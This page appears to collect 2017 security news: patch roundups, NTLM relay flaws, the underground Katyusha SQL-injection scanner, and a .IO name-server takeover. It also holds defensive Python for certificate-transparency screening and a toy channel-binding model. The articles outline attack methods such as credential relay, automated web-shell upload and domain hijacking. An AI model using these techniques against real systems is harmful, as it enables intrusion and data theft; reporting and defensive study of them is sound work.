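            if registrable(host) in allowed:
                continue  # the brand's own certificate, wildcard or not
            hit: Optional[str] = next((b for b in brands if b in host), None)
            if hit:
                reason = f"brand keyword '{hit}' outside allowlisted domains"
                if wildcard:
                    reason += "; wildcard hides the hostnames actually used"
                findings.append(Finding(entry.log_index, raw, reason))
            elif wildcard:
                # Nothing suspicious in the base name, but lookalike
                # subdomains under it would be invisible to CT monitoring.
                findings.append(Finding(entry.log_index, raw,
                                        "wildcard hides subdomain names"))
    return findings


# Constructed sample entries (not real log data).
SAMPLE_ENTRIES = [
    CertEntry(101, "Example CA", ["acmepay-secure-login.example",
                                  "www.acmepay-secure-login.example"]),
    CertEntry(102, "Example CA", ["*.acmepay.example", "acmepay.example"]),
    CertEntry(103, "Example CA", ["*.acmepay-verify.example"]),
    CertEntry(104, "Example CA", ["*.unrelated-blog.example"]),
    CertEntry(105, "Example CA", ["mail.somewhere.example"]),
]


def screen_sample() -> List[Finding]:
    # Brand keyword and allowlist are constructed for the example.
    return screen(SAMPLE_ENTRIES, ["acmepay"], ["acmepay.example"])


if __name__ == "__main__":
    for f in screen_sample():
        print(f"log #{f.log_index}: {f.name}: {f.reason}")
```

Running it reports the two lookalike hostnames in entry 101 and the brand-bearing wildcard in entry 103 as high-priority findings, and the unrelated wildcard in entry 104 as a low-priority "cannot see subdomains" note; the brand’s own certificate (entry 102) is skipped because its registrable domain is allowlisted. A real deployment would feed `screen()` from a CT monitor’s API and replace `registrable()` with a public-suffix-aware implementation.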


PSD2 and Open Banking Bring Problems and Opportunities for Global Banks

12.7.2017 securityweek Security

Global Banks Should Not Ignore Europe's Payment Services Directive 2 (PSD2)

Payment Services Directive 2 (PSD2) is a new EU banking/finance regulation coming into force in January 2018. It is designed to shake up the finance sector -- perhaps even designed to weaken the overall strength of the banks following the 2008 crash. While European in origin, it is something American and other global banks should not -- and perhaps cannot -- ignore.

The banks are considered too powerful and monolithic, with sole and complete ownership of their customers' financial data. The European bureaucrats want to introduce some competition. Their chosen route is to force the banks to provide APIs that will allow third-party apps to access customer data and provide new services not currently offered by the banks. The bureaucrats believe third parties will then re-invigorate the payments and finance markets for end users.

There are enormous difficulties for the banks -- for while they are required to give third-party access to customer data, they will remain liable for the security of that data under the General Data Protection Regulation (GDPR).

Consider if this is done via a social media organization. That organization will build an app that provides access to, and uses, its customers' financial data. The banks can authenticate the social media organization; but the social media app authenticates the user. It is possible, then, that access to customer financial data will be controlled only by social media logon; and that will almost certainly be less secure than the multi-factor and behavioral security measures that many banks currently use.

But where there are problems, there are also opportunities. The banks that provide effective and efficient APIs could attract new customers from banks that provide poor APIs, all coming from the quality of the third-party apps that use those APIs. As Steve Kirsch, CEO at Token, told SecurityWeek, "In general, when you see a new unstoppable trend, the biggest winners are generally the earliest adopters."

There are two reasons for American banks (and other global banks) to conform to this new European regulation. Firstly, American banks with a European operation will be required to do so. Secondly, European banks with an American operation will bring their APIs with them. Since the customer will be the biggest winner in this new world of open banking, American banks not offering a similar service will be at a disadvantage. "American banks should be rushing to implement open banking on their own," says Kirsch. "It is a major step forward for banking."

The GSM Association (GSMA: the trade body that represents mobile operators with more than 1000 full and associate members) agrees that US banks should get involved. "It should not take a law for American banks to take up PSD2 principles," Marta Ienco, head of government and regulatory affairs at GSMA Personal Data, told SecurityWeek. "Instilling consumer confidence that money is safe, with fewer clunky security measures, will mean more customers want to use their service and trust the company."

GSMA believes that mobile banking is inherently secure. "Operators can leverage user data such as location, account and usage history, which in turn can be used to help verify transactions. Moreover," added Ienco, "this rich data can also help minimize instances of account takeover fraud. So, if someone tries to change the mobile number associated with a bank account, the operator can determine if the original mobile number is still in use, and use it to alert the customer to any suspicious changes to their personal details."

Like many regulations, PSD2 describes what must be done, but not how it can be achieved. This leads to difficulties for both the third-party app developers, and for the banks themselves.

For the developers, it does mandate 2FA; but that is about all. While there are some de facto API standards, such as REST and OAuth, there is no standard for the PSD2 banking APIs. "The APIs for different banks could all be completely different in how they work, how their authentication is achieved, and so on," explains Andrew Whaley, VP of engineering at Arxan Technologies. "The practical problems for an organization trying to consume these APIs (such as a social media organization, or whatever) means that the third-party potentially has to build a different adapter for every different bank."

For the banks, one difficulty will be in maintaining their own strict authentication requirements. "PSD2 is clear that the banks are still responsible for the customer data ownership, and the safety of the data," explains Whaley. "So, if the third party gets hold of the data, and its access controls are not particularly strong and someone else gets hold of the data, accidentally or deliberately, the bank is still liable for the third party's failure. The only way the banks can counter this is to bring the technology and countermeasures they already have in their own apps to bear in this space and force their own authentication standards through the API so that they have direct communication with the customer before the third-party can get access to the data."

GSMA agrees that the banks are caught between PSD2 and GDPR. "If banks aren't completely certain of the provenance of a request, and decline a request from a service provider, they could be in violation of PSD2. But if a data breach then takes place, they could also become liable under the rules of GDPR, also coming into effect next year."

PSD2 is a done deal and will come into effect in January 2018. European banks cannot avoid it, and American banks with a European presence (that is, European customers) will need to comply for those European customers. However, the global nature of big bank operations means that PSD2 APIs will inevitably come into play in the US. When that happens, US banks unable to take part in the new world of open banking will be at a distinct disadvantage to those that can.


HPE Addresses Vulnerabilities in Several Products

12.7.2017 securityweek Vulnerability

Hewlett Packard Enterprise (HPE) has informed customers of security bypass, information disclosure, remote code execution, cross-site scripting (XSS) and URL redirection vulnerabilities in several of its products. Advisories for each of the affected products were published this week on the Full Disclosure mailing list.

According to the company, the Samba component of HPE NonStop Server is affected by access restriction bypass (CVE-2017-2619) and remote code execution flaws (CVE-2017-7494). The latter is also known as EternalRed and SambaCry, and it has already been exploited in the wild to deliver malware. The vulnerability affects the products of several major software vendors.

HPE has not released patches for the Samba bugs, but it has provided some workarounds that can be used to prevent potential attacks. The security holes affect Samba on NonStop T1201L01 through T1201L01^AAL, and T1201H01 through T1201H01^AAM. Fixes will be included in the upcoming T1201L01^AAO and T1201H01^AAN versions.

The company also informed customers that it has rolled out patches for security bypass, XSS and URL redirection vulnerabilities affecting the HPE Network Node Manager i (NNMi) software.

The flaws, collectively tracked as CVE-2017-8948 with a severity rating of “critical,” can be exploited remotely. The security holes affect versions 10.0x, 10.1x and 10.2x, and patches have been made available for each of them.

The HPE SiteScope application monitoring software is affected by four vulnerabilities, including remote code execution and security restrictions bypass flaws rated “high severity.” The other two weaknesses affecting SiteScope are encryption-related issues that can lead to the disclosure of sensitive information.

The security holes affect versions 11.2x and 11.3x, and they have been addressed with the release of security updates and mitigations.

The SiteScope vulnerabilities were disclosed last month by CERT/CC and researcher Richard Kelley after the discovery of hundreds of potentially vulnerable installations on the Internet. At the time, HPE promised to release patches for the more serious flaws in the third quarter and pointed out that the encryption bugs are covered in the product’s deployment guide.

An updated advisory – initially released in mid-May – has also been published by HPE on the Full Disclosure mailing list this week. The advisory informs users of five critical and high severity remote code execution vulnerabilities affecting the HPE Intelligent Management Center (iMC) network management platform.


Critical Flaws Found in Windows NTLM Security Protocol – Patch Now
12.7.2017 thehackernews Vulnerability

As part of this month's Patch Tuesday, Microsoft has released security patches for a serious privilege escalation vulnerability that affects all enterprise versions of its Windows operating system released since 2007.
Researchers at behavioral firewall specialist Preempt discovered two zero-day vulnerabilities in Windows NTLM security protocols, both of which allow attackers to create a new domain administrator account and get control of the entire domain.
NT LAN Manager (NTLM) is an old authentication protocol used on networks that include systems running the Windows operating system and stand-alone systems.
Although NTLM was replaced by Kerberos in Windows 2000, which adds greater security to systems on a network, NTLM is still supported by Microsoft and remains widely used.
The first vulnerability involves Lightweight Directory Access Protocol (LDAP) being unprotected against NTLM relay, and the second impacts the Remote Desktop Protocol (RDP) Restricted-Admin mode.
LDAP fails to adequately protect against NTLM relay attacks even with its built-in defensive measure, LDAP signing, which only protects against man-in-the-middle (MitM) attacks and not against credential forwarding at all.
The vulnerability could allow an attacker with SYSTEM privileges on a target system to use incoming NTLM sessions and perform the LDAP operations, like updating domain objects, on behalf of the NTLM user.
"To realize how severe this issue is, we need to realize all Windows protocols use the Windows Authentication API (SSPI) which allows downgrade of an authentication session to NTLM," Yaron Zinar from Preempt said in a blog post, detailing the vulnerability.
"As a result, every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network."
Video Demonstration of Relay Attack
Preempt researchers also provided a video to demonstrate credential relay attacks.
The second NTLM vulnerability affects the Remote Desktop Protocol (RDP) Restricted-Admin mode, which allows users to connect to a remote computer without giving their password.
According to Preempt researchers, RDP Restricted-Admin allows authentication systems to downgrade to NTLM. This means the attacks performed with NTLM, such as credential relaying and password cracking, could also be carried out against RDP Restricted-Admin.
When combined with the LDAP relay vulnerability, an attacker could create a fake domain admin account whenever an admin connects with RDP Restricted-Admin and get control of the entire domain.
The researchers discovered and privately reported LDAP and RDP Relay vulnerabilities in NTLM to Microsoft in April.
However, Microsoft acknowledged the NTLM LDAP vulnerability in May, assigning it CVE-2017-8563, but dismissed the RDP bug, claiming it is a "known issue" and recommending configuring a network to be safe from any NTLM relay.
"In a remote attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to send malicious traffic to a domain controller. An attacker who successfully exploited this vulnerability could run processes in an elevated context," Microsoft explained in its advisory.
"The update addresses this vulnerability by incorporating enhancements to authentication protocols designed to mitigate authentication attacks. It revolves around the concept of channel binding information."
Sysadmins are therefore advised to patch their vulnerable servers that have NT LAN Manager enabled as soon as possible.
Alternatively, consider turning NT LAN Manager off, or require that incoming LDAP and SMB packets be digitally signed, in order to prevent credential relay attacks.
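Microsoft's fix, quoted above, "revolves around the concept of channel binding information." The toy model below is an added illustration for this page, not Microsoft's or Preempt's code and not the real NTLM message format, MIC or AV_PAIR encoding: a client answers a server challenge with an HMAC keyed by a password-derived secret, and in the bound variant also commits to a hash of the TLS certificate of the endpoint it is actually connected to. The certificates, the password and the server names are constructed. It shows why signing alone does not help against relay (the forwarded response is valid as-is) while binding does: a response computed against the relay's certificate cannot satisfy a domain controller presenting a different one, and a server in enforcing mode rejects unbound responses outright.

```python
"""Toy model of channel binding as a relay countermeasure.

Constructed illustration only: not NTLM's real message format, MIC or
AV_PAIR encoding. A client answers a server challenge with an HMAC keyed by
a password-derived secret; the 'bound' variant also commits to a hash of
the TLS certificate of the endpoint the client is actually talking to.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional


def derive_secret(password: str) -> bytes:
    """Stand-in for the stored credential (real NTLM uses MD4 of UTF-16LE)."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def channel_binding_token(endpoint_cert: bytes) -> bytes:
    """Hash of the certificate the client saw on its TLS connection."""
    return hashlib.sha256(endpoint_cert).digest()


def client_response(secret: bytes, challenge: bytes,
                    endpoint_cert: Optional[bytes] = None) -> bytes:
    """Unbound response covers only the challenge; a bound response also
    covers the channel binding token, so it is valid for one endpoint only."""
    data = challenge
    if endpoint_cert is not None:
        data += channel_binding_token(endpoint_cert)
    return hmac.new(secret, data, hashlib.sha256).digest()


class Server:
    """A server (think domain controller) that holds the user's secret."""

    def __init__(self, cert: bytes, secret: bytes, require_binding: bool):
        self.cert = cert
        self.secret = secret
        self.require_binding = require_binding

    def new_challenge(self) -> bytes:
        return os.urandom(16)

    def verify(self, challenge: bytes, response: bytes) -> bool:
        bound = client_response(self.secret, challenge, self.cert)
        if hmac.compare_digest(response, bound):
            return True
        if self.require_binding:
            return False  # enforcing mode: unbound responses are rejected
        unbound = client_response(self.secret, challenge)
        return hmac.compare_digest(response, unbound)


def direct_login(server: Server, secret: bytes, client_binds: bool) -> bool:
    """Client talks to the server directly, so its view of the cert is right."""
    challenge = server.new_challenge()
    cert = server.cert if client_binds else None
    return server.verify(challenge, client_response(secret, challenge, cert))


def relayed_login(target: Server, relay_cert: bytes, secret: bytes,
                  client_binds: bool) -> bool:
    """The client's connection terminates at a host presenting relay_cert,
    which forwards the target's challenge and the client's answer unchanged."""
    challenge = target.new_challenge()
    cert = relay_cert if client_binds else None
    return target.verify(challenge, client_response(secret, challenge, cert))


# Constructed certificates and credential for the demo.
DC_CERT = b"constructed-cert:dc.corp.example"
RELAY_CERT = b"constructed-cert:other-host.example"
SECRET = derive_secret("correct horse battery staple")


def run_demo() -> Dict[str, bool]:
    """Outcome for each combination of client binding and server policy."""
    lenient = Server(DC_CERT, SECRET, require_binding=False)
    strict = Server(DC_CERT, SECRET, require_binding=True)
    return {
        "direct, bound, strict server": direct_login(strict, SECRET, True),
        "direct, unbound, strict server": direct_login(strict, SECRET, False),
        "relay, unbound, lenient server": relayed_login(lenient, RELAY_CERT, SECRET, False),
        "relay, bound, lenient server": relayed_login(lenient, RELAY_CERT, SECRET, True),
        "relay, unbound, strict server": relayed_login(strict, RELAY_CERT, SECRET, False),
    }


if __name__ == "__main__":
    for case, ok in run_demo().items():
        print(f"{case:32} -> {'accepted' if ok else 'rejected'}")
```

Only the "relay, unbound, lenient server" case is accepted, which is the situation the article describes; once either the client binds or the server enforces binding, the relayed response no longer verifies. The lenient server corresponds to a deployment that accepts both bound and unbound clients, which is why the mitigation has to be enforced on the server side to be effective.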
Besides this NTLM relay flaw, Microsoft has released patches for 55 security vulnerabilities, 19 of them rated critical, in several of its products, including Edge, Internet Explorer, Windows, Office and Office Services and Web Apps, .NET Framework, and Exchange Server.
Windows users are strongly advised to install the latest updates as soon as possible in order to protect themselves against the active attacks in the wild.


Microsoft Patches Over 50 Vulnerabilities

12.7.2017 securityweek Vulnerability

Microsoft has patched more than 50 vulnerabilities in its products, including Windows, Internet Explorer, Edge, Office, SharePoint, .NET, Exchange and HoloLens. While some of them have already been disclosed, the tech giant is not aware of any malicious attacks exploiting these flaws.

One of the weaknesses whose details have already been publicly disclosed is CVE-2017-8584, a critical remote code execution vulnerability affecting HoloLens, Microsoft’s mixed reality headset.

The security hole, caused by the way HoloLens handles objects in memory, can be exploited by sending specially crafted Wi-Fi packets to a device. Successful exploitation can allow the attacker to take control of the targeted system.

This is just one of the 19 vulnerabilities rated critical. The list also includes remote code execution vulnerabilities in Windows Search, Windows Explorer, Internet Explorer and the scripting engines used by Microsoft’s web browsers.

The Windows Search flaw (CVE-2017-8589) can be exploited by sending a specially crafted message to this service, which can allow a hacker to elevate privileges and take control of the device. Microsoft pointed out that in an enterprise environment, a remote attacker can exploit the flaw without authentication using an SMB connection.

Other flaws that have already been disclosed are CVE-2017-8587, a Windows denial-of-service (DoS) issue, and CVE-2017-8611 and CVE-2017-8602, both of which are spoofing vulnerabilities affecting web browsers.

Renato Marinho, director of research at Morphus Labs, believes there are also some “important” vulnerabilities worth mentioning. This includes privilege escalation bugs related to the Windows Common Log File System (CLFS) driver and the NT LAN Manager (NTLM) Authentication Protocol, a PowerShell remote code execution flaw, a Kerberos SNAME security feature bypass, and a remote code execution weakness affecting WordPad.

Trend Micro’s Zero Day Initiative (ZDI) pointed out that with the July 2017 Patch Tuesday fixes, Microsoft has addressed all the vulnerabilities disclosed at this year’s Pwn2Own hacking competition.

Microsoft has also updated the Flash Player libraries used by its products – Adobe patched three vulnerabilities on Tuesday with the release of version 26.0.0.137.


Katyusha Scanner — Telegram-based Fully Automated SQL Injection Tool
12.7.2017 thehackernews  Safety

A powerful new hacking tool recently introduced on an underground forum is making the rounds these days, allowing anyone to rapidly scan websites for SQL injection flaws on a massive scale — all controlled from a smartphone using the Telegram messaging application.
Dubbed Katyusha Scanner, the fully automated SQLi vulnerability scanner first surfaced in April this year when a Russian-speaking individual published it on a popular hacking forum.
Researchers at Recorded Future's Insikt Group threat intelligence division found this tool for sale on an underground hacking forum for just $500. Users can even rent the Katyusha Scanner tool for $200.
According to the researchers, Katyusha Scanner is a web-based tool that combines the Arachni scanner with a basic SQL injection exploitation tool, allowing users to automatically identify SQLi-vulnerable sites and then exploit them to take over their databases.
Arachni is an open source vulnerability scanning tool aimed towards helping users evaluate the security of their web applications.
What makes this tool stand out is its 'Infrastructure-as-a-Service' model.
Remotely Control Hacking Tool Via Telegram

Katyusha Scanner is abusing the Telegram messaging application to control its operations, such as sending and receiving commands.
The Katyusha Scanner tool is quite easy to set up and use, allowing anyone to conduct large-scale attacks against many targeted websites simultaneously using nothing more than their smartphone.
The Pro version of the tool not just identifies vulnerable websites, but also allows hackers to establish a "strong foothold within vulnerable web servers" and automatically extract "privileged information such as login credentials."
Once the scan is complete, Katyusha Scanner sends a text message to the criminals with the vulnerable site name, its Alexa web ratings, helping criminals identify popular websites that would likely be more profitable for them to attack, and the number of databases.
The criminals, even with no technical knowledge, can download any exfiltrated data available by just clicking on their smartphones to issue commands.
Katyusha Scanner also allows for the automatic dumping of databases and can be used on both Linux as well as Windows machines.
"The availability of a highly robust and inexpensive tool...Katyusha Scanner to online criminals with limited technical skills will only intensify the compromised data problem experienced by various businesses, highlighting the importance of regular infrastructure security audits," researchers at Recorded Future wrote.
Many buyers praised the quality of the tool on the black market site, one of the satisfied customers who got immediate success in obtaining access to eight web servers wrote:
"Excellent support! The seller has configured the software for my server, which was failing before, however, right now it flies divinely! I highly recommend the software, and it has found eight SQL vulnerabilities in half a day, great automation of the routine. Very grateful to the seller."
Another wrote: "The author has helped with the product setup after the purchase, and (Katyusha) has immediately found SQL vulnerability. Thank you for the great product."
Initially, Katyusha Scanner was sold for $500, but due to unexpectedly high demand, a light version of the tool with slightly limited functionality was released on May 10, 2017, at just $250.
With the release of the most recent Katyusha 0.8 Pro update at the end of June, the author also made the scanner available for rent at $200 per month for the first time.


Katyusha Scanner, a new SQLi Vulnerability Scanner Available for $500 in the underground
12.7.2017 securityaffairs IT

Katyusha Scanner is a new fully automated SQLi vulnerability scanner discovered by researchers at security firm Recorded Future.
Recorded Future security researchers have discovered a fully automated SQLi vulnerability scanner, dubbed Katyusha Scanner, on a hacking forum. The tool is offered for sale for just $500; it allows mass scans, simply managed from a smartphone through the Telegram messenger. The company, of course, reported the discovery to law enforcement.

The Katyusha Scanner appeared in the hacking underground in early April. It was developed starting from the Anarchi Scanner open source penetration testing tool and, according to the researchers, it has already been updated seven times since its introduction.

The Katyusha Scanner is offered in a Pro and a Lite version, priced between $250 and $500.

The Pro version leverages known exploits to hack into the system; once a SQL injection bug is found, the tool notifies the attacker via a text message that includes the site name, Alexa rating, and the number of available databases.

“On April 8, 2017, a Russian-speaking member of a top-tier hacking forum introduced “Katyusha Scanner,” the powerful and fully automated SQLi vulnerability scanner that utilizes the functionality of Telegram messenger and Anarchi Scanner, an open-source penetration testing tool,” states the blog post published by Recorded Future.

“The released product, coupled with outstanding support and frequent updates, immediately gained popularity and accolades of grateful clients for an intuitive and straightforward interface, as well as incredible performance.”

[Figure: Katyusha Scanner analysis]

Researchers at Recorded Future reported that the seller is Russian speaking and is known in the hacking underground for selling data stolen from e-commerce websites. According to the experts, the forum where the tool is commercialized is frequented by top-tier Russian hackers.

An innovative feature implemented in the Katyusha Scanner allows crooks to upload a list of target websites and launch concurrent attacks against all of them at once, seamlessly controlling the operation via Telegram.

The scanner is easy to use: the attackers only need to set up a standard web server with the version of the Anarchi scanner that has been modified to allow control of the operation through a linked Telegram account.

The attackers can control the attack using almost every mobile OS.

“Interestingly, the name Katyusha was not chosen by chance — it represents an iconic multiple rocket launcher, developed by the Soviet Union during World War II known for inflicting panic in Nazi forces with its stealthy and devastating attacks. Similar to the very lethal weapon conceived 70 years ago, Katyusha Scanner allows criminals to initiate large-scale penetration attacks against a massive number of targeted websites with several clicks using their smartphones.” continues the analysis.

The seller suggests starting with at least 500 target sites; attackers can then issue commands to scan them for any known vulnerabilities. The Pro version also implements the capability of downloading any exfiltrated data available.

According to Recorded Future, at least 12 to 15 users have already purchased the tool, and they were satisfied with its efficiency.

The potential scale of the attacks that the tool is able to power is worrisome.

“When dozens buy it and initiate attacks every day, the potential fallout will be significant,” Recorded Future director of advanced collection Andrei Barysevich said. “The scale of attacks which is available to criminals is quite unprecedented now. And the convenience of this; someone who wants to engage in this type of activity doesn’t have to be a hacker, he doesn’t have to know how certain tools operate or what exploit packs they should be using. The tool will do everything for them.”


SAP Addresses High Severity Vulnerabilities With July 2017 Patches

12.7.2017 securityweek  Vulnerability

SAP today announced that a total of 12 Security Notes were included in its July 2017 Security Patch Day, including four notes that address high severity vulnerabilities.

Of the 12 Security Notes, 2 were updates to previously released Patch Day Security Notes, the German software maker reveals. Cross-Site Scripting and Information Disclosure bugs were the most common types of issues addressed.

Additionally, SAP released 11 Support Package Notes, for a total of 23 Security Notes. Overall, 11 of the Notes were released after June 13, but before July 11. Of the 23 Notes, 5 were updates to previously released Security Notes, ERPScan reveals.

The most severe of the addressed vulnerabilities involved Missing authorization checks in SAP Point of Sale (POS) Retail Xpress Server. With a CVSS score of 8.1, the bug could be exploited to read, write, or delete files stored on the SAP POS server; shut down the Xpress Server application; and monitor all content displayed on a receipt window of a POS.

“An attacker can use a Missing authorization check vulnerability to access a service without any authorization procedure and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks,” ERPScan explains.

Another High severity bug was a Missing authorization check vulnerability in SAP Host Agent. With a CVSS score of 7.5, the issue “could allow an attacker to remotely restart SAP Host Agent without authentication, through a specific crafted SOAP request,” security firm Onapsis reveals.

The company explains that all SAP Host Agent versions up to 7.21 PL24 are affected, including all Netweaver-based applications and HANA 1 and HANA 2. The issue was resolved in SAP Host Agent version 7.21 PL25. SAP HANA users should upgrade to Revision 122.10 (for SAP HANA1.00 SPS12), Revision 2.02 (for SAP HANA2.0 SPS00), or Revision 12 (for SAP HANA2.0 SPS01).

The remaining High priority security notes include: Improved security for outgoing HTTPS connections in SAP NetWeaver, with a CVSS score of 7.4; and Missing authorization-check in BC-SRV-ALV, with a CVSS score of 6.0. Both are updates to previously released security notes.

Other dangerous vulnerabilities addressed this month in SAP products include a Code injection vulnerability (CVSS Base Score: 6.5) in SAP Governance, Risk and Compliance Access Controls (GRC); Cross-site scripting and Cross-site request forgery (CVSS Base Score: 6.1) in SAP CRM Internet Sales Administration Console; an XML external entity vulnerability (CVSS Base Score: 6.1) in SAP BI Promotion Management Application; and an XML external entity vulnerability (CVSS Base Score: 5.4) in SAP Business Objects Titan.

“This month only 43% of notes require no manual steps besides note installation. Installing these notes is easier than the other ones and patching them has direct impact on information security. This percentage is lower than the average (usually between 60% and 75%) so this means this month’s users should perform more manual steps to have better coverage of patches in their environments,” Onapsis explains.


Symantec to Acquire Mobile Security Firm Skycure

12.7.2017 securityweek  IT

Just three days after announcing that it would acquire Fireglass, Symantec announced that it has agreed to acquire mobile security firm Skycure.

Founded in 2012 by two former members of Israel Defense Forces' Unit 8200, Skycure has raised a total of $27.5 million in funding to date, and offers a threat prevention platform aimed at protecting mobile devices by monitoring network traffic behavior and fixing suspicious activity.

Symantec said that Skycure’s technology would be combined with its Integrated Cyber Defense Platform, giving Symantec customers “access to comprehensive and effective endpoint protection offerings across traditional and mobile devices, with enhanced capabilities for mobile devices, applications, network gateways and data protection."

Symantec also said that gaining access to Skycure’s technology will help position the company to serve as a strategic partner for telecommunications companies looking to build out mobile security offerings for their end users.

While no financial terms were disclosed, analysts from investment firm Jefferies estimate the acquisition cost to be roughly $200 million.

“While it's logical for [Symantec] to expand further into this market for a complete endpoint (desktop + server + mobile) offering, we note that it has been difficult to monetize mobile,” Jefferies wrote in a research note Tuesday. “Additionally, while we believe the go-to-market strategy to partner with telcos is logical, we note that it is likely at a substantially lower ASP than the direct channel. Therefore, we continue to believe that even traction gained within the telco channel may not be a meaningful contributor to revenue given greater go-to-market efficiency (i.e., lower price points).”

Jefferies also commented on the acquisition of Fireglass, calling it a “smart offensive and defensive move.”

“We saw the acquisition of Fireglass as a smart offensive and defensive move, as its browser isolation technology can be used to enter a new and potentially high-growth market, while defending the Symantec proxy solutions from any potential threat this market could pose,” the note added.

According to Symantec CEO Greg Clark, the company believes the future is “mobile-first” and requires protection that single platform vendors will struggle to provide on their own. “Our investments in this area will bring defense-in-depth across platforms including closed operating systems,” Clark said in a statement.

“We believe the Skycure acquisition is logical given an increasingly mobile-first world, but believe that the return on this investment is incrementally less obvious given ongoing challenges to monetize mobile security,” Jefferies analysts opined.


Russian Financial Cybercriminal Gets Over 9 Years In U.S. Prison
11.7.2017 thehackernews CyberCrime
A 29-year-old Russian-born, Los Angeles resident has been sentenced to over nine years in prison for running botnets of half a million computers and stealing and trafficking tens of thousands of credit card numbers on exclusive Russian-speaking cybercriminal forums.
Alexander Tverdokhlebov was arrested in February, pleaded guilty on March 31 to wire fraud and on Monday, a federal court sentenced him to 110 months in prison.
According to court documents, Tverdokhlebov was an active member of several highly exclusive Russian-speaking cybercriminal forums largely engaged in money laundering services, selling stolen sensitive data, and malware tools since at least 2008.
Tverdokhlebov offered several illegal services on these underground forums, including the exchange of tools, services and stolen personal and financial information.
The hacker also operated several botnets – a network of compromised ordinary home and office computers that are controlled by hackers and can be used to steal credit card and other sensitive financial information.
At various occasions between 2009 and 2013, Tverdokhlebov claimed on the underground forums that "he possessed 40,000 stolen credit card numbers and could control up to 500,000 infected computers."
Tverdokhlebov emigrated from Russia in 2007 and later obtained United States citizenship. He also hired two Russian students studying in America to cash out funds from a compromised bank account.
At the time of his arrest in February, federal authorities seized approximately $5 million in Bitcoin and $272,000 in cash from Tverdokhlebov, while he was trying to steal money from thousands of online US bank accounts.
According to the prosecutors, Tverdokhlebov stole sensitive financial information from at least 100 victims, with estimated losses totaling between $9.5 million and $25 million.
"As part of the sentencing, the court also ordered the defendant to serve three years of supervised release following his prison term, with conditions of release that will include monitoring of the defendant's computer use," the Department of Justice said.
Most of his family is still based in Russia, and the only significant tie he has in the United States is a relationship with a Russian-born woman based there. Tverdokhlebov also married an American citizen in 2009 but divorced her shortly after.


SQLi Vulnerability Scanner Available on Hacking Forum at $500

11.7.2017 securityweek  Safety
A fully automated SQLi vulnerability scanner is available for purchase on a hacking forum for just $500, Recorded Future security researchers have discovered.

Dubbed Katyusha Scanner, the powerful tool was posted on a popular hacking forum by a Russian-speaking individual, on April 8, 2017. The scanner takes advantage of the functionality of Telegram messenger, as well as of Anarchi Scanner, an open-source penetration testing tool, the security researchers reveal.

The application has already received numerous updates, the last of them introduced on June 26, 2017, as Katyusha 0.8 Pro. Because of “outstanding support” from its author, the scanner immediately gained popularity among users, and started being praised for its intuitive and straightforward interface, and for performance capabilities.

Not only does the scanner allow miscreants to control the hacking process using a standard web interface, but it also provides users with the possibility to “upload a list of websites of interest and launch the concurrent attack against several targets simultaneously,” the researchers say. The operation can be seamlessly controlled via Telegram messenger.

Apparently, the scanner’s name specifically reflects this capability, making reference to the multiple-rocket launcher developed by the Soviet Union during World War II.

“Similar to the very lethal weapon conceived 70 years ago, Katyusha Scanner allows criminals to initiate large-scale penetration attacks against a massive number of targeted websites with several clicks using their smartphones,” Recorded Future explains.

Katyusha Scanner was made available at $500, with a light version released on May 10, 2017 at $250. The latter variant has slightly limited functionality, but was introduced due to the high demand the original scanner registered. Along with the Katyusha 0.8 Pro update at the end of June, the author also made the tool available for rent at $200 per month.

Recorded Future researchers warn that “the Pro version offers significantly more robust functionality, not only capable of identification but also establishing a strong foothold within vulnerable web servers and an automatic extraction of privileged information such as login credentials.”

Once the scan has been completed, the tool can display the Alexa web rating for each identified target, providing cybercriminals with “immediate visibility into the popularity of the resource and possible profit level in the future.”

The scanner can search and export email/password credentials, is multi-threaded (with support for concurrent sessions), and offers a module framework, Telegram messenger interface, and web interface. Furthermore, it allows for automatic dumping of databases, supports SQLMAP reports and file upload (the list of targeted websites), and can be used on both Linux and Windows.

The web shell module features CMS family identification (Bitrix, WordPress, OpenCart, etc.), login credentials brute-forcing (concurrent with SQLi scan), and automatic web shell upload.

Available scanning options include SQL injection (sql_injection) — Error-based detection (Oracle, InterBase, PostgreSQL, MySQL, MSSQL, EMC, SQLite, DB2, Informix, Firebird, SAP MaxDB, Sybase, Frontbase, Ingres, HSQLDB, MS Access), Blind SQL injection using differential analysis (sql_injection_differential), and Blind SQL injection using timing attacks (sql_injection_timing – MySQL, PostgreSQL, and MSSQL).

“Despite the fact that SQLi attacks have been around for over 20 years, we are still seeing them successfully being used as common attack vectors by online criminals. The availability of a highly robust and inexpensive tool such as Katyusha Scanner to online criminals with limited technical skills will only intensify the compromised data problem experienced by various businesses, highlighting the importance of regular infrastructure security audits,” Recorded Future concludes.


Researcher Takes Over .IO Domains by Registering Name Servers

11.7.2017 securityweek  IT

A security researcher could have taken over thousands of .IO domains after being able to register four domain names of the top level domain (TLD)’s authoritative name servers.

The incident happened last month, when researcher Matthew Bryant was “graphing out the DNS delegation paths of various TLDs.” During his project, he discovered a name server domain that was available for registration and was able to purchase it.

".IO" is the country code top level domain (ccTLD) assigned to the British Indian Ocean Territory.

TLDs have authoritative name servers at arbitrary domain names but, by exploiting errors such as misconfiguration, expiration, or other issues, it is possible to “register a name server domain name and use it to serve new DNS records for the entire TLD zone,” the security researcher explains.

For that, one would have to enumerate all name server hostnames for a given extension and then check for base-domains that expired and are available for registration. In some instances, however, the expired domains would not be available for purchase even if not marked as reserved.

Using this method, the researcher stumbled upon the name server domain of ns-a1.io, which appeared as available for the registration price of 90.00 USD. After successfully purchasing it, Bryant attempted to contact the .io TLD to get the issue fixed, but failed.

As a result, he decided to look for other similar name server domains and found ns-a2.io, ns-a3.io, and ns-a4.io domains available for purchase as well. All four domains are listed as authoritative name servers for the .io TLD, and anyone controlling them could potentially “poison/redirect the DNS for all .io domain names registered,” the researcher explains.

Bryant was eventually able to send an email to the appropriate security contact and was informed the next day that the issue was resolved. The researcher verified that he was not able to re-register these domains, showing that the error was remediated.

“Given the fact that we were able to take over four of the seven authoritative name servers for the .io TLD we would be able to poison/redirect the DNS for all .io domain names registered. Not only that, but since we have control over a majority of the name servers it’s actually more likely that clients will randomly select our hijacked name servers over any of the legitimate name servers even before employing tricks like long TTL responses, etc to further tilt the odds in our favor,” the researcher explains.

